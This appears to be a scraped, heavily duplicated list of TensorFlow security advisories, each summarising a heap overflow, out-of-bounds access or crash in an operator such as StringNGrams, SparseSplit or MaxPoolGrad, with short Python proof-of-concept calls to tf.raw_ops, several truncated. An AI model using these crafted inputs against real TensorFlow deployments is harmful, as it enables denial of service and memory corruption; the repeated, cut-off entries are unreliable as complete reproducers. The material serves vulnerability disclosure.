A specially crafted TFLite model could trigger an OOB write on heap in the TFLite implementation of ArgMin/ArgMax: TfLiteIntArray* output_dims = TfLiteIntArrayCreate(NumDimensions(input) - 1); int j = 0; for (int i = 0; i < NumDimensions(input); ++i) { if (i != axis_value) { output_dims->data[j] = SizeOfDimension(input, i); ++j; } } If axis_value is not a value between 0 and NumDimensions(input), then the condition in the if is never true, so …
A specially crafted TFLite model could trigger an OOB write on heap in the TFLite implementation of ArgMin/ArgMax: TfLiteIntArray* output_dims = TfLiteIntArrayCreate(NumDimensions(input) - 1); int j = 0; for (int i = 0; i < NumDimensions(input); ++i) { if (i != axis_value) { output_dims->data[j] = SizeOfDimension(input, i); ++j; } } If axis_value is not a value between 0 and NumDimensions(input), then the condition in the if is never true, so …
The implementations of the Minimum and Maximum TFLite operators can be used to read data outside of bounds of heap allocated objects, if any of the two input tensor arguments are empty.
The implementations of the Minimum and Maximum TFLite operators can be used to read data outside of bounds of heap allocated objects, if any of the two input tensor arguments are empty.
The implementations of the Minimum and Maximum TFLite operators can be used to read data outside of bounds of heap allocated objects, if any of the two input tensor arguments are empty.
A specially crafted TFLite model could trigger an OOB read on heap in the TFLite implementation of Split_V: const int input_size = SizeOfDimension(input, axis_value); If axis_value is not a value between 0 and NumDimensions(input), then the SizeOfDimension function will access data outside the bounds of the tensor shape array: inline int SizeOfDimension(const TfLiteTensor* t, int dim) { return t->dims->data[dim]; }
A specially crafted TFLite model could trigger an OOB read on heap in the TFLite implementation of Split_V: const int input_size = SizeOfDimension(input, axis_value); If axis_value is not a value between 0 and NumDimensions(input), then the SizeOfDimension function will access data outside the bounds of the tensor shape array: inline int SizeOfDimension(const TfLiteTensor* t, int dim) { return t->dims->data[dim]; }
A specially crafted TFLite model could trigger an OOB read on heap in the TFLite implementation of Split_V: const int input_size = SizeOfDimension(input, axis_value); If axis_value is not a value between 0 and NumDimensions(input), then the SizeOfDimension function will access data outside the bounds of the tensor shape array: inline int SizeOfDimension(const TfLiteTensor* t, int dim) { return t->dims->data[dim]; }
Due to lack of validation in tf.raw_ops.Dequantize, an attacker can trigger a read from outside of bounds of heap allocated data: import tensorflow as tf input_tensor=tf.constant( [75, 75, 75, 75, -6, -9, -10, -10, -10, -10, -10, -10, -10, -10, -10, -10,\ -10, -10, -10, -10, -10, -10, -10, -10, -10, -10, -10, -10, -10, -10, -10,\ -10, -10, -10, -10, -10, -10, -10, -10, -10, -10, -10, -10, -10, …
Due to lack of validation in tf.raw_ops.Dequantize, an attacker can trigger a read from outside of bounds of heap allocated data: import tensorflow as tf input_tensor=tf.constant( [75, 75, 75, 75, -6, -9, -10, -10, -10, -10, -10, -10, -10, -10, -10, -10,\ -10, -10, -10, -10, -10, -10, -10, -10, -10, -10, -10, -10, -10, -10, -10,\ -10, -10, -10, -10, -10, -10, -10, -10, -10, -10, -10, -10, -10, …
Due to lack of validation in tf.raw_ops.Dequantize, an attacker can trigger a read from outside of bounds of heap allocated data: import tensorflow as tf input_tensor=tf.constant( [75, 75, 75, 75, -6, -9, -10, -10, -10, -10, -10, -10, -10, -10, -10, -10,\ -10, -10, -10, -10, -10, -10, -10, -10, -10, -10, -10, -10, -10, -10, -10,\ -10, -10, -10, -10, -10, -10, -10, -10, -10, -10, -10, -10, -10, …
An attacker can read data outside of bounds of heap allocated buffer in tf.raw_ops.QuantizeAndDequantizeV3: import tensorflow as tf tf.raw_ops.QuantizeAndDequantizeV3( input=[2.5,2.5], input_min=[0,0], input_max=[1,1], num_bits=[30], signed_input=False, range_given=False, narrow_range=False, axis=3)
An attacker can read data outside of bounds of heap allocated buffer in tf.raw_ops.QuantizeAndDequantizeV3: import tensorflow as tf tf.raw_ops.QuantizeAndDequantizeV3( input=[2.5,2.5], input_min=[0,0], input_max=[1,1], num_bits=[30], signed_input=False, range_given=False, narrow_range=False, axis=3)
An attacker can read data outside of bounds of heap allocated buffer in tf.raw_ops.QuantizeAndDequantizeV3: import tensorflow as tf tf.raw_ops.QuantizeAndDequantizeV3( input=[2.5,2.5], input_min=[0,0], input_max=[1,1], num_bits=[30], signed_input=False, range_given=False, narrow_range=False, axis=3)
Due to lack of validation in tf.raw_ops.RaggedTensorToTensor, an attacker can exploit an undefined behavior if input arguments are empty: import tensorflow as tf shape = tf.constant([-1, -1], shape=[2], dtype=tf.int64) values = tf.constant([], shape=[0], dtype=tf.int64) default_value = tf.constant(404, dtype=tf.int64) row = tf.constant([269, 404, 0, 0, 0, 0, 0], shape=[7], dtype=tf.int64) rows = [row] types = ['ROW_SPLITS'] tf.raw_ops.RaggedTensorToTensor( shape=shape, values=values, default_value=default_value, row_partition_tensors=rows, row_partition_types=types)
Due to lack of validation in tf.raw_ops.RaggedTensorToTensor, an attacker can exploit an undefined behavior if input arguments are empty: import tensorflow as tf shape = tf.constant([-1, -1], shape=[2], dtype=tf.int64) values = tf.constant([], shape=[0], dtype=tf.int64) default_value = tf.constant(404, dtype=tf.int64) row = tf.constant([269, 404, 0, 0, 0, 0, 0], shape=[7], dtype=tf.int64) rows = [row] types = ['ROW_SPLITS'] tf.raw_ops.RaggedTensorToTensor( shape=shape, values=values, default_value=default_value, row_partition_tensors=rows, row_partition_types=types)
Due to lack of validation in tf.raw_ops.RaggedTensorToTensor, an attacker can exploit an undefined behavior if input arguments are empty: import tensorflow as tf shape = tf.constant([-1, -1], shape=[2], dtype=tf.int64) values = tf.constant([], shape=[0], dtype=tf.int64) default_value = tf.constant(404, dtype=tf.int64) row = tf.constant([269, 404, 0, 0, 0, 0, 0], shape=[7], dtype=tf.int64) rows = [row] types = ['ROW_SPLITS'] tf.raw_ops.RaggedTensorToTensor( shape=shape, values=values, default_value=default_value, row_partition_tensors=rows, row_partition_types=types)
An attacker can access data outside of bounds of heap allocated array in tf.raw_ops.UnicodeEncode: import tensorflow as tf input_values = tf.constant([58], shape=[1], dtype=tf.int32) input_splits = tf.constant([[81, 101, 0]], shape=[3], dtype=tf.int32) output_encoding = "UTF-8" tf.raw_ops.UnicodeEncode( input_values=input_values, input_splits=input_splits, output_encoding=output_encoding)
An attacker can access data outside of bounds of heap allocated array in tf.raw_ops.UnicodeEncode: import tensorflow as tf input_values = tf.constant([58], shape=[1], dtype=tf.int32) input_splits = tf.constant([[81, 101, 0]], shape=[3], dtype=tf.int32) output_encoding = "UTF-8" tf.raw_ops.UnicodeEncode( input_values=input_values, input_splits=input_splits, output_encoding=output_encoding)
An attacker can access data outside of bounds of heap allocated array in tf.raw_ops.UnicodeEncode: import tensorflow as tf input_values = tf.constant([58], shape=[1], dtype=tf.int32) input_splits = tf.constant([[81, 101, 0]], shape=[3], dtype=tf.int32) output_encoding = "UTF-8" tf.raw_ops.UnicodeEncode( input_values=input_values, input_splits=input_splits, output_encoding=output_encoding)
An attacker can write outside the bounds of heap allocated arrays by passing invalid arguments to tf.raw_ops.Dilation2DBackpropInput: import tensorflow as tf input_tensor = tf.constant([1.1] * 81, shape=[3, 3, 3, 3], dtype=tf.float32) filter = tf.constant([], shape=[0, 0, 3], dtype=tf.float32) out_backprop = tf.constant([1.1] * 1062, shape=[3, 2, 59, 3], dtype=tf.float32) tf.raw_ops.Dilation2DBackpropInput( input=input_tensor, filter=filter, out_backprop=out_backprop, strides=[1, 40, 1, 1], rates=[1, 56, 56, 1], padding='VALID')
An attacker can write outside the bounds of heap allocated arrays by passing invalid arguments to tf.raw_ops.Dilation2DBackpropInput: import tensorflow as tf input_tensor = tf.constant([1.1] * 81, shape=[3, 3, 3, 3], dtype=tf.float32) filter = tf.constant([], shape=[0, 0, 3], dtype=tf.float32) out_backprop = tf.constant([1.1] * 1062, shape=[3, 2, 59, 3], dtype=tf.float32) tf.raw_ops.Dilation2DBackpropInput( input=input_tensor, filter=filter, out_backprop=out_backprop, strides=[1, 40, 1, 1], rates=[1, 56, 56, 1], padding='VALID')
An attacker can write outside the bounds of heap allocated arrays by passing invalid arguments to tf.raw_ops.Dilation2DBackpropInput: import tensorflow as tf input_tensor = tf.constant([1.1] * 81, shape=[3, 3, 3, 3], dtype=tf.float32) filter = tf.constant([], shape=[0, 0, 3], dtype=tf.float32) out_backprop = tf.constant([1.1] * 1062, shape=[3, 2, 59, 3], dtype=tf.float32) tf.raw_ops.Dilation2DBackpropInput( input=input_tensor, filter=filter, out_backprop=out_backprop, strides=[1, 40, 1, 1], rates=[1, 56, 56, 1], padding='VALID')
An attacker can cause a heap buffer overflow by passing crafted inputs to tf.raw_ops.StringNGrams: import tensorflow as tf separator = b'\x02\x00' ngram_widths = [7, 6, 11] left_pad = b'\x7f\x7f\x7f\x7f\x7f' right_pad = b'\x7f\x7f\x25\x5d\x53\x74' pad_width = 50 preserve_short_sequences = True l = ['', '', '', '', '', '', '', '', '', '', ''] data = tf.constant(l, shape=[11], dtype=tf.string) l2 = [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, …
An attacker can cause a heap buffer overflow by passing crafted inputs to tf.raw_ops.StringNGrams: import tensorflow as tf separator = b'\x02\x00' ngram_widths = [7, 6, 11] left_pad = b'\x7f\x7f\x7f\x7f\x7f' right_pad = b'\x7f\x7f\x25\x5d\x53\x74' pad_width = 50 preserve_short_sequences = True l = ['', '', '', '', '', '', '', '', '', '', ''] data = tf.constant(l, shape=[11], dtype=tf.string) l2 = [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, …
An attacker can cause a heap buffer overflow by passing crafted inputs to tf.raw_ops.StringNGrams: import tensorflow as tf separator = b'\x02\x00' ngram_widths = [7, 6, 11] left_pad = b'\x7f\x7f\x7f\x7f\x7f' right_pad = b'\x7f\x7f\x25\x5d\x53\x74' pad_width = 50 preserve_short_sequences = True l = ['', '', '', '', '', '', '', '', '', '', ''] data = tf.constant(l, shape=[11], dtype=tf.string) l2 = [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, …
An attacker can trigger a denial of service via a CHECK-fail in converting sparse tensors to CSR Sparse matrices: import tensorflow as tf import numpy as np from tensorflow.python.ops.linalg.sparse import sparse_csr_matrix_ops indices_array = np.array([[0, 0]]) value_array = np.array([0.0], dtype=np.float32) dense_shape = [0, 0] st = tf.SparseTensor(indices_array, value_array, dense_shape) values_tensor = sparse_csr_matrix_ops.sparse_tensor_to_csr_sparse_matrix( st.indices, st.values, st.dense_shape)
An attacker can trigger a denial of service via a CHECK-fail in converting sparse tensors to CSR Sparse matrices: import tensorflow as tf import numpy as np from tensorflow.python.ops.linalg.sparse import sparse_csr_matrix_ops indices_array = np.array([[0, 0]]) value_array = np.array([0.0], dtype=np.float32) dense_shape = [0, 0] st = tf.SparseTensor(indices_array, value_array, dense_shape) values_tensor = sparse_csr_matrix_ops.sparse_tensor_to_csr_sparse_matrix( st.indices, st.values, st.dense_shape)
An attacker can cause a heap buffer overflow in tf.raw_ops.SparseSplit: import tensorflow as tf shape_dims = tf.constant(0, dtype=tf.int64) indices = tf.ones([1, 1], dtype=tf.int64) values = tf.ones([1], dtype=tf.int64) shape = tf.ones([1], dtype=tf.int64) tf.raw_ops.SparseSplit( split_dim=shape_dims, indices=indices, values=values, shape=shape, num_split=1)
An attacker can cause a heap buffer overflow in tf.raw_ops.SparseSplit: import tensorflow as tf shape_dims = tf.constant(0, dtype=tf.int64) indices = tf.ones([1, 1], dtype=tf.int64) values = tf.ones([1], dtype=tf.int64) shape = tf.ones([1], dtype=tf.int64) tf.raw_ops.SparseSplit( split_dim=shape_dims, indices=indices, values=values, shape=shape, num_split=1)
An attacker can cause a heap buffer overflow in tf.raw_ops.SparseSplit: import tensorflow as tf shape_dims = tf.constant(0, dtype=tf.int64) indices = tf.ones([1, 1], dtype=tf.int64) values = tf.ones([1], dtype=tf.int64) shape = tf.ones([1], dtype=tf.int64) tf.raw_ops.SparseSplit( split_dim=shape_dims, indices=indices, values=values, shape=shape, num_split=1)
An attacker can cause a heap buffer overflow in tf.raw_ops.RaggedTensorToTensor: import tensorflow as tf shape = tf.constant([10, 10], shape=[2], dtype=tf.int64) values = tf.constant(0, shape=[1], dtype=tf.int64) default_value = tf.constant(0, dtype=tf.int64) l = [849, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, …
An attacker can cause a heap buffer overflow in tf.raw_ops.RaggedTensorToTensor: import tensorflow as tf shape = tf.constant([10, 10], shape=[2], dtype=tf.int64) values = tf.constant(0, shape=[1], dtype=tf.int64) default_value = tf.constant(0, dtype=tf.int64) l = [849, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, …
An attacker can cause a heap buffer overflow in tf.raw_ops.RaggedTensorToTensor: import tensorflow as tf shape = tf.constant([10, 10], shape=[2], dtype=tf.int64) values = tf.constant(0, shape=[1], dtype=tf.int64) default_value = tf.constant(0, dtype=tf.int64) l = [849, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, …
If the splits argument of RaggedBincount does not specify a valid SparseTensor, then an attacker can trigger a heap buffer overflow: import tensorflow as tf tf.raw_ops.RaggedBincount(splits=[0], values=[1,1,1,1,1], size=5, weights=[1,2,3,4], binary_output=False)
If the splits argument of RaggedBincount does not specify a valid SparseTensor, then an attacker can trigger a heap buffer overflow: import tensorflow as tf tf.raw_ops.RaggedBincount(splits=[0], values=[1,1,1,1,1], size=5, weights=[1,2,3,4], binary_output=False)
If the splits argument of RaggedBincount does not specify a valid SparseTensor, then an attacker can trigger a heap buffer overflow: import tensorflow as tf tf.raw_ops.RaggedBincount(splits=[0], values=[1,1,1,1,1], size=5, weights=[1,2,3,4], binary_output=False)
An attacker can cause a heap buffer overflow in QuantizedResizeBilinear by passing in invalid thresholds for the quantization: import tensorflow as tf images = tf.constant([], shape=[0], dtype=tf.qint32) size = tf.constant([], shape=[0], dtype=tf.int32) min = tf.constant([], dtype=tf.float32) max = tf.constant([], dtype=tf.float32) tf.raw_ops.QuantizedResizeBilinear(images=images, size=size, min=min, max=max, align_corners=False, half_pixel_centers=False)
An attacker can cause a heap buffer overflow in QuantizedResizeBilinear by passing in invalid thresholds for the quantization: import tensorflow as tf images = tf.constant([], shape=[0], dtype=tf.qint32) size = tf.constant([], shape=[0], dtype=tf.int32) min = tf.constant([], dtype=tf.float32) max = tf.constant([], dtype=tf.float32) tf.raw_ops.QuantizedResizeBilinear(images=images, size=size, min=min, max=max, align_corners=False, half_pixel_centers=False)
An attacker can cause a heap buffer overflow in QuantizedResizeBilinear by passing in invalid thresholds for the quantization: import tensorflow as tf images = tf.constant([], shape=[0], dtype=tf.qint32) size = tf.constant([], shape=[0], dtype=tf.int32) min = tf.constant([], dtype=tf.float32) max = tf.constant([], dtype=tf.float32) tf.raw_ops.QuantizedResizeBilinear(images=images, size=size, min=min, max=max, align_corners=False, half_pixel_centers=False)
An attacker can cause a heap buffer overflow in QuantizedReshape by passing in invalid thresholds for the quantization: import tensorflow as tf tensor = tf.constant([], dtype=tf.qint32) shape = tf.constant([], dtype=tf.int32) input_min = tf.constant([], dtype=tf.float32) input_max = tf.constant([], dtype=tf.float32) tf.raw_ops.QuantizedReshape(tensor=tensor, shape=shape, input_min=input_min, input_max=input_max)
An attacker can cause a heap buffer overflow in QuantizedReshape by passing in invalid thresholds for the quantization: import tensorflow as tf tensor = tf.constant([], dtype=tf.qint32) shape = tf.constant([], dtype=tf.int32) input_min = tf.constant([], dtype=tf.float32) input_max = tf.constant([], dtype=tf.float32) tf.raw_ops.QuantizedReshape(tensor=tensor, shape=shape, input_min=input_min, input_max=input_max)
An attacker can cause a heap buffer overflow in QuantizedReshape by passing in invalid thresholds for the quantization: import tensorflow as tf tensor = tf.constant([], dtype=tf.qint32) shape = tf.constant([], dtype=tf.int32) input_min = tf.constant([], dtype=tf.float32) input_max = tf.constant([], dtype=tf.float32) tf.raw_ops.QuantizedReshape(tensor=tensor, shape=shape, input_min=input_min, input_max=input_max)
An attacker can cause a heap buffer overflow in QuantizedMul by passing in invalid thresholds for the quantization: import tensorflow as tf x = tf.constant([256, 328], shape=[1, 2], dtype=tf.quint8) y = tf.constant([256, 328], shape=[1, 2], dtype=tf.quint8) min_x = tf.constant([], dtype=tf.float32) max_x = tf.constant([], dtype=tf.float32) min_y = tf.constant([], dtype=tf.float32) max_y = tf.constant([], dtype=tf.float32) tf.raw_ops.QuantizedMul(x=x, y=y, min_x=min_x, max_x=max_x, min_y=min_y, max_y=max_y)
An attacker can cause a heap buffer overflow in QuantizedMul by passing in invalid thresholds for the quantization: import tensorflow as tf x = tf.constant([256, 328], shape=[1, 2], dtype=tf.quint8) y = tf.constant([256, 328], shape=[1, 2], dtype=tf.quint8) min_x = tf.constant([], dtype=tf.float32) max_x = tf.constant([], dtype=tf.float32) min_y = tf.constant([], dtype=tf.float32) max_y = tf.constant([], dtype=tf.float32) tf.raw_ops.QuantizedMul(x=x, y=y, min_x=min_x, max_x=max_x, min_y=min_y, max_y=max_y)
An attacker can cause a heap buffer overflow in QuantizedMul by passing in invalid thresholds for the quantization: import tensorflow as tf x = tf.constant([256, 328], shape=[1, 2], dtype=tf.quint8) y = tf.constant([256, 328], shape=[1, 2], dtype=tf.quint8) min_x = tf.constant([], dtype=tf.float32) max_x = tf.constant([], dtype=tf.float32) min_y = tf.constant([], dtype=tf.float32) max_y = tf.constant([], dtype=tf.float32) tf.raw_ops.QuantizedMul(x=x, y=y, min_x=min_x, max_x=max_x, min_y=min_y, max_y=max_y)
The implementation of tf.raw_ops.MaxPoolGrad is vulnerable to a heap buffer overflow: import tensorflow as tf orig_input = tf.constant([0.0], shape=[1, 1, 1, 1], dtype=tf.float32) orig_output = tf.constant([0.0], shape=[1, 1, 1, 1], dtype=tf.float32) grad = tf.constant([], shape=[0, 0, 0, 0], dtype=tf.float32) ksize = [1, 1, 1, 1] strides = [1, 1, 1, 1] padding = "SAME" tf.raw_ops.MaxPoolGrad( orig_input=orig_input, orig_output=orig_output, grad=grad, ksize=ksize, strides=strides, padding=padding, explicit_paddings=[])
The implementation of tf.raw_ops.MaxPoolGrad is vulnerable to a heap buffer overflow: import tensorflow as tf orig_input = tf.constant([0.0], shape=[1, 1, 1, 1], dtype=tf.float32) orig_output = tf.constant([0.0], shape=[1, 1, 1, 1], dtype=tf.float32) grad = tf.constant([], shape=[0, 0, 0, 0], dtype=tf.float32) ksize = [1, 1, 1, 1] strides = [1, 1, 1, 1] padding = "SAME" tf.raw_ops.MaxPoolGrad( orig_input=orig_input, orig_output=orig_output, grad=grad, ksize=ksize, strides=strides, padding=padding, explicit_paddings=[])
The implementation of tf.raw_ops.MaxPoolGrad is vulnerable to a heap buffer overflow: import tensorflow as tf orig_input = tf.constant([0.0], shape=[1, 1, 1, 1], dtype=tf.float32) orig_output = tf.constant([0.0], shape=[1, 1, 1, 1], dtype=tf.float32) grad = tf.constant([], shape=[0, 0, 0, 0], dtype=tf.float32) ksize = [1, 1, 1, 1] strides = [1, 1, 1, 1] padding = "SAME" tf.raw_ops.MaxPoolGrad( orig_input=orig_input, orig_output=orig_output, grad=grad, ksize=ksize, strides=strides, padding=padding, explicit_paddings=[])
The implementation of tf.raw_ops.MaxPool3DGradGrad is vulnerable to a heap buffer overflow: import tensorflow as tf values = [0.01] * 11 orig_input = tf.constant(values, shape=[11, 1, 1, 1, 1], dtype=tf.float32) orig_output = tf.constant([0.01], shape=[1, 1, 1, 1, 1], dtype=tf.float32) grad = tf.constant([0.01], shape=[1, 1, 1, 1, 1], dtype=tf.float32) ksize = [1, 1, 1, 1, 1] strides = [1, 1, 1, 1, 1] padding = "SAME" tf.raw_ops.MaxPool3DGradGrad( orig_input=orig_input, orig_output=orig_output, grad=grad, ksize=ksize, strides=strides, …
The implementation of tf.raw_ops.MaxPool3DGradGrad is vulnerable to a heap buffer overflow: import tensorflow as tf values = [0.01] * 11 orig_input = tf.constant(values, shape=[11, 1, 1, 1, 1], dtype=tf.float32) orig_output = tf.constant([0.01], shape=[1, 1, 1, 1, 1], dtype=tf.float32) grad = tf.constant([0.01], shape=[1, 1, 1, 1, 1], dtype=tf.float32) ksize = [1, 1, 1, 1, 1] strides = [1, 1, 1, 1, 1] padding = "SAME" tf.raw_ops.MaxPool3DGradGrad( orig_input=orig_input, orig_output=orig_output, grad=grad, ksize=ksize, strides=strides, …
The implementation of tf.raw_ops.MaxPool3DGradGrad is vulnerable to a heap buffer overflow: import tensorflow as tf values = [0.01] * 11 orig_input = tf.constant(values, shape=[11, 1, 1, 1, 1], dtype=tf.float32) orig_output = tf.constant([0.01], shape=[1, 1, 1, 1, 1], dtype=tf.float32) grad = tf.constant([0.01], shape=[1, 1, 1, 1, 1], dtype=tf.float32) ksize = [1, 1, 1, 1, 1] strides = [1, 1, 1, 1, 1] padding = "SAME" tf.raw_ops.MaxPool3DGradGrad( orig_input=orig_input, orig_output=orig_output, grad=grad, ksize=ksize, strides=strides, …
The implementation of tf.raw_ops.FractionalAvgPoolGrad is vulnerable to a heap buffer overflow: import tensorflow as tf orig_input_tensor_shape = tf.constant([1, 3, 2, 3], shape=[4], dtype=tf.int64) out_backprop = tf.constant([2], shape=[1, 1, 1, 1], dtype=tf.int64) row_pooling_sequence = tf.constant([1], shape=[1], dtype=tf.int64) col_pooling_sequence = tf.constant([1], shape=[1], dtype=tf.int64) tf.raw_ops.FractionalAvgPoolGrad( orig_input_tensor_shape=orig_input_tensor_shape, out_backprop=out_backprop, row_pooling_sequence=row_pooling_sequence, col_pooling_sequence=col_pooling_sequence, overlapping=False)
The implementation of tf.raw_ops.FractionalAvgPoolGrad is vulnerable to a heap buffer overflow: import tensorflow as tf orig_input_tensor_shape = tf.constant([1, 3, 2, 3], shape=[4], dtype=tf.int64) out_backprop = tf.constant([2], shape=[1, 1, 1, 1], dtype=tf.int64) row_pooling_sequence = tf.constant([1], shape=[1], dtype=tf.int64) col_pooling_sequence = tf.constant([1], shape=[1], dtype=tf.int64) tf.raw_ops.FractionalAvgPoolGrad( orig_input_tensor_shape=orig_input_tensor_shape, out_backprop=out_backprop, row_pooling_sequence=row_pooling_sequence, col_pooling_sequence=col_pooling_sequence, overlapping=False)
The implementation of tf.raw_ops.FractionalAvgPoolGrad is vulnerable to a heap buffer overflow: import tensorflow as tf orig_input_tensor_shape = tf.constant([1, 3, 2, 3], shape=[4], dtype=tf.int64) out_backprop = tf.constant([2], shape=[1, 1, 1, 1], dtype=tf.int64) row_pooling_sequence = tf.constant([1], shape=[1], dtype=tf.int64) col_pooling_sequence = tf.constant([1], shape=[1], dtype=tf.int64) tf.raw_ops.FractionalAvgPoolGrad( orig_input_tensor_shape=orig_input_tensor_shape, out_backprop=out_backprop, row_pooling_sequence=row_pooling_sequence, col_pooling_sequence=col_pooling_sequence, overlapping=False)
Missing validation between arguments to tf.raw_ops.Conv3DBackprop* operations can result in heap buffer overflows: import tensorflow as tf input_sizes = tf.constant([1, 1, 1, 1, 2], shape=[5], dtype=tf.int32) filter_tensor = tf.constant([734.6274508233133, -10.0, -10.0, -10.0, -10.0, -10.0, -10.0, -10.0, -10.0, -10.0, -10.0, -10.0, -10.0, -10.0, -10.0, -10.0, -10.0, -10.0, -10.0, -10.0, -10.0, -10.0, -10.0, -10.0], shape=[4, 1, 6, 1, 1], dtype=tf.float32) out_backprop = tf.constant([-10.0], shape=[1, 1, 1, 1, 1], dtype=tf.float32) tf.raw_ops.Conv3DBackpropInputV2(input_sizes=input_sizes, filter=filter_tensor, out_backprop=out_backprop, …
Missing validation between arguments to tf.raw_ops.Conv3DBackprop* operations can result in heap buffer overflows: import tensorflow as tf input_sizes = tf.constant([1, 1, 1, 1, 2], shape=[5], dtype=tf.int32) filter_tensor = tf.constant([734.6274508233133, -10.0, -10.0, -10.0, -10.0, -10.0, -10.0, -10.0, -10.0, -10.0, -10.0, -10.0, -10.0, -10.0, -10.0, -10.0, -10.0, -10.0, -10.0, -10.0, -10.0, -10.0, -10.0, -10.0], shape=[4, 1, 6, 1, 1], dtype=tf.float32) out_backprop = tf.constant([-10.0], shape=[1, 1, 1, 1, 1], dtype=tf.float32) tf.raw_ops.Conv3DBackpropInputV2(input_sizes=input_sizes, filter=filter_tensor, out_backprop=out_backprop, …
Missing validation between arguments to tf.raw_ops.Conv3DBackprop* operations can result in heap buffer overflows: import tensorflow as tf input_sizes = tf.constant([1, 1, 1, 1, 2], shape=[5], dtype=tf.int32) filter_tensor = tf.constant([734.6274508233133, -10.0, -10.0, -10.0, -10.0, -10.0, -10.0, -10.0, -10.0, -10.0, -10.0, -10.0, -10.0, -10.0, -10.0, -10.0, -10.0, -10.0, -10.0, -10.0, -10.0, -10.0, -10.0, -10.0], shape=[4, 1, 6, 1, 1], dtype=tf.float32) out_backprop = tf.constant([-10.0], shape=[1, 1, 1, 1, 1], dtype=tf.float32) tf.raw_ops.Conv3DBackpropInputV2(input_sizes=input_sizes, filter=filter_tensor, out_backprop=out_backprop, …
An attacker can cause a heap buffer overflow to occur in Conv2DBackpropFilter: import tensorflow as tf input_tensor = tf.constant([386.078431372549, 386.07843139643234], shape=[1, 1, 1, 2], dtype=tf.float32) filter_sizes = tf.constant([1, 1, 1, 1], shape=[4], dtype=tf.int32) out_backprop = tf.constant([386.078431372549], shape=[1, 1, 1, 1], dtype=tf.float32) tf.raw_ops.Conv2DBackpropFilter( input=input_tensor, filter_sizes=filter_sizes, out_backprop=out_backprop, strides=[1, 66, 49, 1], use_cudnn_on_gpu=True, padding='VALID', explicit_paddings=[], data_format='NHWC', dilations=[1, 1, 1, 1] ) Alternatively, passing empty tensors also results in similar behavior: import tensorflow as …
An attacker can cause a heap buffer overflow to occur in Conv2DBackpropFilter: import tensorflow as tf input_tensor = tf.constant([386.078431372549, 386.07843139643234], shape=[1, 1, 1, 2], dtype=tf.float32) filter_sizes = tf.constant([1, 1, 1, 1], shape=[4], dtype=tf.int32) out_backprop = tf.constant([386.078431372549], shape=[1, 1, 1, 1], dtype=tf.float32) tf.raw_ops.Conv2DBackpropFilter( input=input_tensor, filter_sizes=filter_sizes, out_backprop=out_backprop, strides=[1, 66, 49, 1], use_cudnn_on_gpu=True, padding='VALID', explicit_paddings=[], data_format='NHWC', dilations=[1, 1, 1, 1] ) Alternatively, passing empty tensors also results in similar behavior: import tensorflow as …
An attacker can cause a heap buffer overflow to occur in Conv2DBackpropFilter: import tensorflow as tf input_tensor = tf.constant([386.078431372549, 386.07843139643234], shape=[1, 1, 1, 2], dtype=tf.float32) filter_sizes = tf.constant([1, 1, 1, 1], shape=[4], dtype=tf.int32) out_backprop = tf.constant([386.078431372549], shape=[1, 1, 1, 1], dtype=tf.float32) tf.raw_ops.Conv2DBackpropFilter( input=input_tensor, filter_sizes=filter_sizes, out_backprop=out_backprop, strides=[1, 66, 49, 1], use_cudnn_on_gpu=True, padding='VALID', explicit_paddings=[], data_format='NHWC', dilations=[1, 1, 1, 1] ) Alternatively, passing empty tensors also results in similar behavior: import tensorflow as …
An attacker can trigger a heap buffer overflow in Eigen implementation of tf.raw_ops.BandedTriangularSolve: import tensorflow as tf import numpy as np matrix_array = np.array([]) matrix_tensor = tf.convert_to_tensor(np.reshape(matrix_array,(0,1)),dtype=tf.float32) rhs_array = np.array([1,1]) rhs_tensor = tf.convert_to_tensor(np.reshape(rhs_array,(1,2)),dtype=tf.float32) tf.raw_ops.BandedTriangularSolve(matrix=matrix_tensor,rhs=rhs_tensor)
An attacker can trigger a heap buffer overflow in Eigen implementation of tf.raw_ops.BandedTriangularSolve: import tensorflow as tf import numpy as np matrix_array = np.array([]) matrix_tensor = tf.convert_to_tensor(np.reshape(matrix_array,(0,1)),dtype=tf.float32) rhs_array = np.array([1,1]) rhs_tensor = tf.convert_to_tensor(np.reshape(rhs_array,(1,2)),dtype=tf.float32) tf.raw_ops.BandedTriangularSolve(matrix=matrix_tensor,rhs=rhs_tensor)
An attacker can trigger a heap buffer overflow in Eigen implementation of tf.raw_ops.BandedTriangularSolve: import tensorflow as tf import numpy as np matrix_array = np.array([]) matrix_tensor = tf.convert_to_tensor(np.reshape(matrix_array,(0,1)),dtype=tf.float32) rhs_array = np.array([1,1]) rhs_tensor = tf.convert_to_tensor(np.reshape(rhs_array,(1,2)),dtype=tf.float32) tf.raw_ops.BandedTriangularSolve(matrix=matrix_tensor,rhs=rhs_tensor)
The implementation of tf.raw_ops.AvgPool3DGrad is vulnerable to a heap buffer overflow: import tensorflow as tf orig_input_shape = tf.constant([10, 6, 3, 7, 7], shape=[5], dtype=tf.int32) grad = tf.constant([0.01, 0, 0], shape=[3, 1, 1, 1, 1], dtype=tf.float32) ksize = [1, 1, 1, 1, 1] strides = [1, 1, 1, 1, 1] padding = "SAME" tf.raw_ops.AvgPool3DGrad( orig_input_shape=orig_input_shape, grad=grad, ksize=ksize, strides=strides, padding=padding)
The implementation of tf.raw_ops.AvgPool3DGrad is vulnerable to a heap buffer overflow: import tensorflow as tf orig_input_shape = tf.constant([10, 6, 3, 7, 7], shape=[5], dtype=tf.int32) grad = tf.constant([0.01, 0, 0], shape=[3, 1, 1, 1, 1], dtype=tf.float32) ksize = [1, 1, 1, 1, 1] strides = [1, 1, 1, 1, 1] padding = "SAME" tf.raw_ops.AvgPool3DGrad( orig_input_shape=orig_input_shape, grad=grad, ksize=ksize, strides=strides, padding=padding)
